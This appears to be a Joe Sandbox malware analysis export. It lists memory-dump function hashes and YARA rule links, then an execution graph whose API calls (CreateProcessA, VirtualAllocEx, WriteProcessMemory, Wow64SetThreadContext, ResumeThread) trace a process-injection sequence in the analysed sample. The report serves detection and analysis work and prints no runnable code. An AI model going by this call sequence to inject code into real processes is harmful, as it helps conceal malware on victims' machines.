                                                                        • Snapshot File: hcaresult_13_2_1480000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $tq$$tq
                                                                        • API String ID: 0-1837209516
                                                                        • Opcode ID: 78a751d47c11860e7374eedd309e8053ade4ee4a248f384366d329beeeb99c14
                                                                        • Instruction ID: a1bcd8c082e332a45eb9b634cf3ac32b83bc18500870dfed75403378b38b8103
                                                                        • Opcode Fuzzy Hash: 78a751d47c11860e7374eedd309e8053ade4ee4a248f384366d329beeeb99c14
                                                                        • Instruction Fuzzy Hash: 5FA1D1747002118FDB1CBB3AD86472E76A3BFC8750F14852AE51A9B3E8DF759C428B90
                                                                        Function 01480DF0 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1755098221.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_1480000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LRtq
                                                                        • API String ID: 0-4092542751
                                                                        • Opcode ID: e969f252129c9e1b63cbb070e8af2b20727f0e9bbbfd164785467407e5224d67
                                                                        • Instruction ID: 40b1ed896786d7e7f931c159f238d6be5b38bd3d4f4a17da5d6c957a61683acf
                                                                        • Opcode Fuzzy Hash: e969f252129c9e1b63cbb070e8af2b20727f0e9bbbfd164785467407e5224d67
                                                                        • Instruction Fuzzy Hash: A9212330B102168FCB59EB79885467F7BF6AFC9200F1884AAE405DB3A5DF34DC068795
                                                                        Function 01480E00 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1755098221.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_1480000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LRtq
                                                                        • API String ID: 0-4092542751
                                                                        • Opcode ID: 68391d6b43f929d57edecb66a7ad908c9319c5c0b0adaaa9f242afccdab7d2d6
                                                                        • Instruction ID: ff0d84e80396fea090bde3a164e2927951ee40f0f1714bd839caf08930036f6b
                                                                        • Opcode Fuzzy Hash: 68391d6b43f929d57edecb66a7ad908c9319c5c0b0adaaa9f242afccdab7d2d6
                                                                        • Instruction Fuzzy Hash: 82210470B102168FCB59EB78855463F7BE6AFC9200F1488AAE005DB3A5DF34DC058795
                                                                        Function 01480901 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1755098221.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_1480000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Hxq
                                                                        • API String ID: 0-2956916855
                                                                        • Opcode ID: 9473f676a2fce3bc80df67d3cf274673025a6146dfaba37bdc7aefadc40f49d8
                                                                        • Instruction ID: 14a18dea8b0a4a628aa1e455af0fc9f8fe7fbe763bbc5d3338633a6e7c44c46c
                                                                        • Opcode Fuzzy Hash: 9473f676a2fce3bc80df67d3cf274673025a6146dfaba37bdc7aefadc40f49d8
                                                                        • Instruction Fuzzy Hash: 9921C530E04248DFCB58EFB8C5152AE7FB2AF85300F1044A9D405DB399DB388E49CB91
                                                                        Function 01481328 Relevance: .5, Instructions: 533COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1755098221.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_1480000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 85dd555a85b3ddbd42c5d55d4d1a5dd5b75704825ec92475e639a34ead735536
                                                                        • Instruction ID: 8012878cf9539ff78dc9e87756338c53d781b3709347b2c89afcb202f9ba87b2
                                                                        • Opcode Fuzzy Hash: 85dd555a85b3ddbd42c5d55d4d1a5dd5b75704825ec92475e639a34ead735536
                                                                        • Instruction Fuzzy Hash: C1217FB090529A9FCF06EF79E86058D7FB0FF49308B10899AD411EB266E7351944CF55
                                                                        Function 01480CE0 Relevance: .1, Instructions: 79COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1755098221.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_1480000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5a781ab84d786a1f6150372db263d6f281c4e4140243f8326c797a4a5166fab1
                                                                        • Instruction ID: 84358bf3b9e8dfc482047f09b433b98b66de746bb0b98456021bca503facaf51
                                                                        • Opcode Fuzzy Hash: 5a781ab84d786a1f6150372db263d6f281c4e4140243f8326c797a4a5166fab1
                                                                        • Instruction Fuzzy Hash: 382126B1B043159FCB48EBBA881436EBBEAFFC8210B14443DD51AD7384DE788C0147A5
                                                                        Function 01480BC9 Relevance: .1, Instructions: 76COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1755098221.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_1480000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2cb83f524e15c3792020c21f9d30d6bba37610bbdf58a77c4287cb016e12befb
                                                                        • Instruction ID: 444aadfbde1b445db270dc3a927cfc4ef531399c7b46743ca1aff2a0f0f04243
                                                                        • Opcode Fuzzy Hash: 2cb83f524e15c3792020c21f9d30d6bba37610bbdf58a77c4287cb016e12befb
                                                                        • Instruction Fuzzy Hash: 4B316174E1021ADFCF45FBB6D8506AE7BB2FF88300B104A6AD11597354EB346945CF51
                                                                        Function 01480BD8 Relevance: .1, Instructions: 69COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1755098221.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_1480000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 977947dbae6510cd7a0518e274d32cc4dab657a99e65be863218670b7ab9e347
                                                                        • Instruction ID: 770cf1c84253bfc71d23fae1e88201707f83952bb501b98948e863d1423a0bc9
                                                                        • Opcode Fuzzy Hash: 977947dbae6510cd7a0518e274d32cc4dab657a99e65be863218670b7ab9e347
                                                                        • Instruction Fuzzy Hash: C5214FB4A1021ADFCF45FBB6D8546AEBBB6FF88300F104A69E115A7354EB706A40CF51
                                                                        Function 01480838 Relevance: .0, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1755098221.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_1480000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d749449ca3adbd2dea4fec1b0e8ed0bae3439ee05051e2d644c52f1303614da3
                                                                        • Instruction ID: d7664f4d41706447bef2a9446b43989e208c0b1558a10efbbde33b6a83ffde08
                                                                        • Opcode Fuzzy Hash: d749449ca3adbd2dea4fec1b0e8ed0bae3439ee05051e2d644c52f1303614da3
                                                                        • Instruction Fuzzy Hash: 4D110A705442579FCB02EF3BF9909463BB6FB88384B004F65E1059B26AE77069458B81
                                                                        Function 01481708 Relevance: .0, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1755098221.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_1480000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2a65687b60596492c603b7fbc59a0617598e6c69976f25ee8db0466bfdd9d945
                                                                        • Instruction ID: 8d97b146e5a3ad14210d5b73e7ba1c88a3d905c9cda61c868c8cc4b188b4d0ef
                                                                        • Opcode Fuzzy Hash: 2a65687b60596492c603b7fbc59a0617598e6c69976f25ee8db0466bfdd9d945
                                                                        • Instruction Fuzzy Hash: 6B1100B4D0011EEFCF48EFB9E95059DBBB1FB88308B008AA9D425A7258EB741A44CF55
                                                                        Function 01480848 Relevance: .0, Instructions: 38COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1755098221.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_1480000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 86b11f99a9ad6276c2bcc2d6798954d74d1123ea536ad75ee45f3f3f22df3680
                                                                        • Instruction ID: 97d15ea98640123f124a14ae1d14ae0c66d3f92f090dbc14deed07fc16989027
                                                                        • Opcode Fuzzy Hash: 86b11f99a9ad6276c2bcc2d6798954d74d1123ea536ad75ee45f3f3f22df3680
                                                                        • Instruction Fuzzy Hash: AF01C97455026B9FCB02EF2BF990A4737A6F788384B004F64E1058B26EE7707A458B81

                                                                        Execution Graph

                                                                        Execution Coverage:10.6%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:228
                                                                        Total number of Limit Nodes:10
                                                                        execution_graph 27828 73244c0 27829 73244e6 27828->27829 27830 732464b 27828->27830 27829->27830 27833 7324740 PostMessageW 27829->27833 27835 7324738 PostMessageW 27829->27835 27834 73247ac 27833->27834 27834->27829 27836 73247ac 27835->27836 27836->27829 27559 14c4668 27560 14c467a 27559->27560 27561 14c4686 27560->27561 27565 14c4779 27560->27565 27570 14c3e34 27561->27570 27563 14c46a5 27566 14c479d 27565->27566 27574 14c4888 27566->27574 27578 14c4879 27566->27578 27571 14c3e3f 27570->27571 27586 14c5c44 27571->27586 27573 14c7018 27573->27563 27576 14c48af 27574->27576 27575 14c498c 27575->27575 27576->27575 27582 14c44b4 27576->27582 27580 14c4888 27578->27580 27579 14c498c 27579->27579 27580->27579 27581 14c44b4 CreateActCtxA 27580->27581 27581->27579 27583 14c5918 CreateActCtxA 27582->27583 27585 14c59db 27583->27585 27587 14c5c4f 27586->27587 27590 14c5c64 27587->27590 27589 14c70bd 27589->27573 27591 14c5c6f 27590->27591 27594 14c5c94 27591->27594 27593 14c719a 27593->27589 27595 14c5c9f 27594->27595 27598 14c5cc4 27595->27598 27597 14c728d 27597->27593 27599 14c5ccf 27598->27599 27601 14c858b 27599->27601 27605 14cac3b 27599->27605 27600 14c85c9 27600->27597 27601->27600 27609 14ccd29 27601->27609 27614 14ccd38 27601->27614 27619 14cac5f 27605->27619 27623 14cac70 27605->27623 27606 14cac4e 27606->27601 27610 14ccd59 27609->27610 27611 14ccd7d 27610->27611 27631 14cced8 27610->27631 27635 14ccee8 27610->27635 27611->27600 27615 14ccd59 27614->27615 27616 14ccd7d 27615->27616 27617 14cced8 GetModuleHandleW 27615->27617 27618 14ccee8 GetModuleHandleW 27615->27618 27616->27600 27617->27616 27618->27616 27620 14cac70 27619->27620 27626 14cad68 27620->27626 27621 14cac7f 27621->27606 27625 14cad68 GetModuleHandleW 27623->27625 27624 14cac7f 27624->27606 27625->27624 27627 14cad9c 27626->27627 27628 14cad79 27626->27628 27627->27621 27628->27627 27629 14cafa0 GetModuleHandleW 27628->27629 27630 14cafcd 27629->27630 27630->27621 27632 14ccef5 27631->27632 27633 14ccf2f 27632->27633 27639 14cbaa0 27632->27639 27633->27611 27637 14ccef5 27635->27637 27636 14ccf2f 27636->27611 27637->27636 27638 14cbaa0 GetModuleHandleW 27637->27638 27638->27636 27640 14cbaab 27639->27640 27642 14cdc48 27640->27642 27643 14cd29c 27640->27643 27642->27642 27644 14cd2a7 27643->27644 27645 14c5cc4 GetModuleHandleW 27644->27645 27646 14cdcb7 27645->27646 27646->27642 27647 73215d9 27649 732158c 27647->27649 27648 73215c9 27649->27648 27653 7323270 27649->27653 27671 73232ce 27649->27671 27690 7323260 27649->27690 27654 732328a 27653->27654 27655 73232ae 27654->27655 27708 7323952 27654->27708 27712 7323cce 27654->27712 27717 7323c4b 27654->27717 27722 7323f8a 27654->27722 27726 7323ac0 27654->27726 27731 7323b00 27654->27731 27735 73236e3 27654->27735 27743 7323a1d 27654->27743 27747 732379d 27654->27747 27752 7323ddf 27654->27752 27757 73237be 27654->27757 27762 73237d1 27654->27762 27767 73238b1 27654->27767 27771 7324111 27654->27771 27775 7323d31 27654->27775 27655->27649 27672 732325c 27671->27672 27673 73232d1 27671->27673 27674 73232ae 27672->27674 27675 7323952 2 API calls 27672->27675 27676 7323d31 2 API calls 27672->27676 27677 7324111 2 API calls 27672->27677 27678 73238b1 2 API calls 27672->27678 27679 73237d1 2 API calls 27672->27679 27680 73237be 2 API calls 27672->27680 27681 7323ddf 2 API calls 27672->27681 27682 732379d 2 API calls 27672->27682 27683 7323a1d 2 API calls 27672->27683 27684 73236e3 4 API calls 27672->27684 27685 7323b00 2 API calls 27672->27685 27686 7323ac0 2 API calls 27672->27686 27687 7323f8a 2 API calls 27672->27687 27688 7323c4b 2 API calls 27672->27688 27689 7323cce 2 API calls 27672->27689 27673->27649 27674->27649 27675->27674 27676->27674 27677->27674 27678->27674 27679->27674 27680->27674 27681->27674 27682->27674 27683->27674 27684->27674 27685->27674 27686->27674 27687->27674 27688->27674 27689->27674 27691 732328a 27690->27691 27692 73232ae 27691->27692 27693 7323952 2 API calls 27691->27693 27694 7323d31 2 API calls 27691->27694 27695 7324111 2 API calls 27691->27695 27696 73238b1 2 API calls 27691->27696 27697 73237d1 2 API calls 27691->27697 27698 73237be 2 API calls 27691->27698 27699 7323ddf 2 API calls 27691->27699 27700 732379d 2 API calls 27691->27700 27701 7323a1d 2 API calls 27691->27701 27702 73236e3 4 API calls 27691->27702 27703 7323b00 2 API calls 27691->27703 27704 7323ac0 2 API calls 27691->27704 27705 7323f8a 2 API calls 27691->27705 27706 7323c4b 2 API calls 27691->27706 27707 7323cce 2 API calls 27691->27707 27692->27649 27693->27692 27694->27692 27695->27692 27696->27692 27697->27692 27698->27692 27699->27692 27700->27692 27701->27692 27702->27692 27703->27692 27704->27692 27705->27692 27706->27692 27707->27692 27780 7320ee0 27708->27780 27784 7320ee8 27708->27784 27709 7323979 27713 7323c69 27712->27713 27714 7323aae 27712->27714 27788 7320ca0 27713->27788 27792 7320c99 27713->27792 27714->27655 27718 7323c51 27717->27718 27720 7320ca0 ResumeThread 27718->27720 27721 7320c99 ResumeThread 27718->27721 27719 7323aae 27719->27655 27720->27719 27721->27719 27796 7320e21 27722->27796 27800 7320e28 27722->27800 27723 7323fa8 27727 7323ac6 27726->27727 27804 7320fd0 27727->27804 27808 7320fd8 27727->27808 27728 732387d 27728->27655 27732 732387d 27731->27732 27733 7320fd0 ReadProcessMemory 27731->27733 27734 7320fd8 ReadProcessMemory 27731->27734 27732->27655 27733->27732 27734->27732 27736 73236f3 27735->27736 27812 7321170 27736->27812 27816 7321164 27736->27816 27745 7320ee0 WriteProcessMemory 27743->27745 27746 7320ee8 WriteProcessMemory 27743->27746 27744 7323a4e 27745->27744 27746->27744 27749 73237a6 27747->27749 27748 73237b8 27748->27655 27749->27748 27750 7320ee0 WriteProcessMemory 27749->27750 27751 7320ee8 WriteProcessMemory 27749->27751 27750->27749 27751->27749 27753 7323c52 27752->27753 27754 7323aae 27753->27754 27755 7320ca0 ResumeThread 27753->27755 27756 7320c99 ResumeThread 27753->27756 27754->27655 27755->27754 27756->27754 27758 73237a6 27757->27758 27758->27757 27759 73237b8 27758->27759 27760 7320ee0 WriteProcessMemory 27758->27760 27761 7320ee8 WriteProcessMemory 27758->27761 27759->27655 27760->27758 27761->27758 27763 73237de 27762->27763 27765 7320fd0 ReadProcessMemory 27763->27765 27766 7320fd8 ReadProcessMemory 27763->27766 27764 732387d 27764->27655 27765->27764 27766->27764 27820 7320d50 27767->27820 27824 7320d49 27767->27824 27768 73238cb 27768->27655 27773 7320d50 Wow64SetThreadContext 27771->27773 27774 7320d49 Wow64SetThreadContext 27771->27774 27772 732412b 27773->27772 27774->27772 27777 73237a6 27775->27777 27776 73237b8 27776->27655 27777->27776 27778 7320ee0 WriteProcessMemory 27777->27778 27779 7320ee8 WriteProcessMemory 27777->27779 27778->27777 27779->27777 27781 7320ee8 WriteProcessMemory 27780->27781 27783 7320f87 27781->27783 27783->27709 27785 7320f30 WriteProcessMemory 27784->27785 27787 7320f87 27785->27787 27787->27709 27789 7320ce0 ResumeThread 27788->27789 27791 7320d11 27789->27791 27791->27714 27793 7320ce0 ResumeThread 27792->27793 27795 7320d11 27793->27795 27795->27714 27797 7320e28 VirtualAllocEx 27796->27797 27799 7320ea5 27797->27799 27799->27723 27801 7320e68 VirtualAllocEx 27800->27801 27803 7320ea5 27801->27803 27803->27723 27805 7321023 ReadProcessMemory 27804->27805 27807 7321067 27805->27807 27807->27728 27809 7321023 ReadProcessMemory 27808->27809 27811 7321067 27809->27811 27811->27728 27813 73211f9 27812->27813 27813->27813 27814 732135e CreateProcessA 27813->27814 27815 73213bb 27814->27815 27817 73211f9 27816->27817 27817->27817 27818 732135e CreateProcessA 27817->27818 27819 73213bb 27818->27819 27821 7320d95 Wow64SetThreadContext 27820->27821 27823 7320ddd 27821->27823 27823->27768 27825 7320d50 Wow64SetThreadContext 27824->27825 27827 7320ddd 27825->27827 27827->27768 27837 7321649 27838 732158c 27837->27838 27839 73215c9 27838->27839 27840 7323270 12 API calls 27838->27840 27841 7323260 12 API calls 27838->27841 27842 73232ce 12 API calls 27838->27842 27840->27838 27841->27838 27842->27838 27545 14cd000 27546 14cd046 27545->27546 27550 14cd5e8 27546->27550 27553 14cd5d9 27546->27553 27547 14cd133 27551 14cd616 27550->27551 27556 14cd23c 27550->27556 27551->27547 27554 14cd23c DuplicateHandle 27553->27554 27555 14cd616 27554->27555 27555->27547 27557 14cd650 DuplicateHandle 27556->27557 27558 14cd6e6 27557->27558 27558->27551

                                                                        Executed Functions

                                                                        Function 073734B8 Relevance: 5.6, Strings: 4, Instructions: 562COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 451 73734b8-73734e0 452 73734e7-73735a3 451->452 453 73734e2 451->453 456 73735a5-73735cb 452->456 457 73735a8-73735b5 452->457 453->452 459 73735d1-73735fb 456->459 460 7373abb-7373afd 456->460 457->456 463 7373601-7373619 459->463 464 7373cc8-7373cd4 459->464 469 7373b00-7373b04 460->469 465 737361f-7373620 463->465 466 7373cda-7373ce3 463->466 464->466 468 7373cae-7373cba 465->468 474 7373ce9-7373cf5 466->474 472 7373625-7373631 468->472 473 7373cc0-7373cc7 468->473 470 73736d6-73736da 469->470 471 7373b0a-7373b10 469->471 476 73736ec-73736f2 470->476 477 73736dc-73736ea 470->477 471->460 475 7373b12-7373b6d 471->475 478 7373633 472->478 479 7373638-7373653 472->479 480 7373cfb-7373d07 474->480 498 7373ba4-7373bce 475->498 499 7373b6f-7373ba2 475->499 482 7373737-737373b 476->482 481 737374a-737377c 477->481 478->479 479->474 483 7373659-737367e 479->483 487 7373d0d-7373d14 480->487 505 73737a6 481->505 506 737377e-737378a 481->506 484 73736f4-7373700 482->484 485 737373d 482->485 483->480 497 7373684-7373686 483->497 490 7373707-737370f 484->490 491 7373702 484->491 488 7373740-7373744 485->488 488->481 493 73736bc-73736d3 488->493 495 7373734 490->495 496 7373711-7373725 490->496 491->490 493->470 495->482 501 737372b-7373732 496->501 502 7373689-7373694 496->502 497->502 513 7373bd7-7373c56 498->513 499->513 501->485 502->487 503 737369a-73736b7 502->503 503->488 511 73737ac-73737d9 505->511 508 7373794-737379a 506->508 509 737378c-7373792 506->509 514 73737a4 508->514 509->514 518 73737db-7373813 511->518 519 7373828-73738bb 511->519 526 7373c5d-7373c70 513->526 514->511 527 7373c7f-7373c84 518->527 534 73738c4-73738c5 519->534 535 73738bd 519->535 526->527 528 7373c86-7373c94 527->528 529 7373c9b-7373cab 527->529 528->529 529->468 536 7373916-737391c 534->536 535->534 537 73738c7-73738e6 536->537 538 737391e-73739e0 536->538 539 73738ed-7373913 537->539 540 73738e8 537->540 549 73739e2-7373a1b 538->549 550 7373a21-7373a25 538->550 539->536 540->539 549->550 551 7373a27-7373a60 550->551 552 7373a66-7373a6a 550->552 551->552 553 7373a6c-7373aa5 552->553 554 7373aab-7373aaf 552->554 553->554 554->475 557 7373ab1-7373ab9 554->557 557->469
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'tq$:$pxq$~
                                                                        • API String ID: 0-2366959149
                                                                        • Opcode ID: c259f5e060ef6e3126e1a2da4cc67a162833247265d646ad1db912180f1b8334
                                                                        • Instruction ID: 37980556326a9da61da9ca34090a5ff47ad9ff8403db7ccacee84cf2beba569d
                                                                        • Opcode Fuzzy Hash: c259f5e060ef6e3126e1a2da4cc67a162833247265d646ad1db912180f1b8334
                                                                        • Instruction Fuzzy Hash: 9F42E3B5A00258DFEB25CFA9C980B99BBB2FF49300F1580E9E509AB361D7359D91DF10
                                                                        Function 07372106 Relevance: 1.8, Strings: 1, Instructions: 562COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 589 7372106-737210a 590 7372acd-7372adf 589->590 591 737210b-7372120 589->591 591->590 592 7372121-737212c 591->592 594 7372132-737213e 592->594 595 737214a-7372159 594->595 597 73721b8-73721bc 595->597 598 7372264-73722ce 597->598 599 73721c2-73721cb 597->599 598->590 637 73722d4-737281b 598->637 600 73720c6-73720d2 599->600 601 73721d1-73721e7 599->601 600->590 603 73720d8-73720e4 600->603 609 7372239-737224b 601->609 610 73721e9-73721ec 601->610 604 73720e6-73720fa 603->604 605 737215b-7372161 603->605 604->605 615 73720fc-7372105 604->615 605->590 607 7372167-737217f 605->607 607->590 618 7372185-73721ad 607->618 619 7372251-7372261 609->619 620 7372a0c-7372ac2 609->620 610->590 611 73721f2-737222f 610->611 611->598 633 7372231-7372237 611->633 615->589 618->597 620->590 633->609 633->610 715 7372832-73728c5 637->715 716 737281d-7372827 637->716 717 73728d0-7372963 715->717 716->717 718 737282d 716->718 719 737296e-7372a01 717->719 718->719 719->620
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: D
                                                                        • API String ID: 0-2746444292
                                                                        • Opcode ID: cdc9f6d173137bd3901088de40fe8ffb57260793229d425b6d326217c2242060
                                                                        • Instruction ID: 784a7fe442b1c020de1dbb8c9b45df021e3c907f030e38ac175915ed0656a4ff
                                                                        • Opcode Fuzzy Hash: cdc9f6d173137bd3901088de40fe8ffb57260793229d425b6d326217c2242060
                                                                        • Instruction Fuzzy Hash: 8352C774A102298FCB64DF68D894AADBBB2BF89301F5041D9D50DAB365CF34AE81CF51
                                                                        Function 07372C38 Relevance: 7.9, Strings: 6, Instructions: 429COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 294 7372c38-7372c4a 295 7372c53-7372c5f 294->295 296 7372c4c-7372c4e 294->296 299 7372c61-7372c63 295->299 300 7372c68-7372c7d 295->300 297 7372d26-7372d2b 296->297 299->297 303 7372c91-7372c9d 300->303 304 7372c7f-7372c8a 300->304 307 7372c9f-7372ca8 303->307 308 7372caa-7372cac 303->308 304->303 307->308 309 7372cae-7372cba 308->309 310 7372cbc-7372cc0 308->310 309->310 315 7372cd2-7372cdc 309->315 311 7372cc2-7372ccc 310->311 312 7372cce-7372cd0 310->312 317 7372d38-7372d44 311->317 312->297 320 7372cde-7372cea 315->320 321 7372d2c-7372d36 315->321 322 7372d46-7372d4f 317->322 323 7372d51-7372d53 317->323 327 7372cfc-7372cfe 320->327 328 7372cec-7372cfa 320->328 321->317 322->297 323->297 327->297 328->327 330 7372d00-7372d06 328->330 331 7372d0a 330->331 332 7372d08 330->332 333 7372d0c-7372d0e 331->333 332->333 334 7372d55-7372de1 333->334 335 7372d10-7372d1c 333->335 348 7372de3-7372ded 334->348 349 7372def-7372e0b 334->349 335->334 338 7372d1e 335->338 338->297 348->349 352 7372e28-7372e3c 348->352 354 7372e23-7372e25 349->354 355 7372e0d-7372e21 349->355 359 7372e43-7372e79 352->359 355->354 355->359 364 7372e7f-7372e91 359->364 365 7372f4e-7372f51 359->365 367 7372ea6-7372ea9 364->367 368 7372e93-7372e96 364->368 371 7372eab-7372eae 367->371 372 7372eb9-7372ebf 367->372 369 7372e9c-7372e9f 368->369 370 7372f1b-7372f21 368->370 377 7372ea1 369->377 378 7372eea-7372ef0 369->378 373 7372f27-7372f33 370->373 374 7372f23-7372f25 370->374 379 7372eb4 371->379 380 7372f4a-7372f4c 371->380 375 7372ec5-7372ed1 372->375 376 7372ec1-7372ec3 372->376 381 7372f35-7372f48 373->381 374->381 382 7372ed3-7372ee8 375->382 376->382 377->380 383 7372ef6-7372f02 378->383 384 7372ef2-7372ef4 378->384 379->380 380->365 385 7372f52-7372fe5 380->385 381->380 382->380 388 7372f04-7372f19 383->388 384->388 401 7372fe7 385->401 402 7372fec-7373000 385->402 388->380 401->402 403 7373006-737300b 402->403 404 73730f4 402->404 405 73730c6 403->405 406 7373011-7373016 403->406 409 73730fa-73730fb 404->409 442 73730c9 call 73784fa 405->442 443 73730c9 call 7378508 405->443 407 7373100 406->407 408 737301c-737301d 406->408 434 7373100 call 73732c2 407->434 435 7373100 call 73732d0 407->435 444 7373020 call 7373d21 408->444 445 7373020 call 7373d30 408->445 446 7373020 call 7373d9e 408->446 409->403 410 73730cf-73730da 418 73730e3 410->418 419 73730dc-73730e0 410->419 411 7373026-7373033 413 737310c-7373113 411->413 414 7373039-737303d 411->414 412 7373106-7373107 412->408 413->414 416 7373043-737305b 414->416 417 7373118-737311f 414->417 426 7373124-737312b 416->426 427 7373061-7373064 416->427 417->416 449 73730e3 call 7324458 418->449 450 73730e3 call 7324449 418->450 420 7373086-7373087 419->420 421 73730e2 419->421 436 737308a call 7376c28 420->436 437 737308a call 7376c18 420->437 421->418 423 73730e9-73730f1 425 7373090-737309c 438 737309f call 7377f41 425->438 439 737309f call 7377f50 425->439 426->427 440 7373067 call 73743b0 427->440 441 7373067 call 73743c0 427->441 428 73730a5-73730b2 428->418 430 73730b4 428->430 429 737306d-737307a 431 7373130-7373137 429->431 432 7373080 429->432 447 73730b7 call 73783d8 430->447 448 73730b7 call 73783c8 430->448 431->432 432->420 433 73730bd-73730c3 433->405 434->412 435->412 436->425 437->425 438->428 439->428 440->429 441->429 442->410 443->410 444->411 445->411 446->411 447->433 448->433 449->423 450->423
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'tq$4'tq$4'tq$4|yq$4|yq$$tq
                                                                        • API String ID: 0-3472957384
                                                                        • Opcode ID: 6f9439276c5c5fe2cf61976536e09dfef422c739f13dab4a4aed38a3583eedcf
                                                                        • Instruction ID: d80af559647c4f1b036f9fc1f635d0a75183af5b28669b6f722270c87a59e639
                                                                        • Opcode Fuzzy Hash: 6f9439276c5c5fe2cf61976536e09dfef422c739f13dab4a4aed38a3583eedcf
                                                                        • Instruction Fuzzy Hash: CFE1DDB5B1421A8FDB25DB79D85467E7BF6BF89201B18446AE00ADB360DF38CC41CB91
                                                                        Function 07321164 Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
